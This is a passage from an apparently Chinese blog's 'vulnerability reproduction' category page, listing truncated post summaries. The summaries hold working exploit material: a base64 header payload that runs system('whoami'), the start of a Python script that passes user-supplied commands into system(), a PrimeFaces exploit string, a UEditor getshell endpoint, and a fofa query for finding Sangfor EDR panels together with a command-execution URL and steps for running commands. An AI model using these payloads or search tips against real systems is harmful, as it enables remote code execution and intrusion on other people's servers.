随笔分类 - 漏洞复现
摘要:Accept-Encoding: gzip,deflate Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs= 地址 脚本如下: import base64,requests,queue,sys payload = "system('"+sys.argv[2]+"');"
阅读全文
摘要:exp payload pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC
阅读全文
摘要:漏洞存在点: http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 漏洞原因:controller.ashx文件下只校验ContentType而没校验文件后缀导致getshell。 payload如下,
阅读全文
摘要:先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令 使用whoami查询当前用户权限 使用pwd查询当前所在目录 查看当
阅读全文

浙公网安备 33010602011771号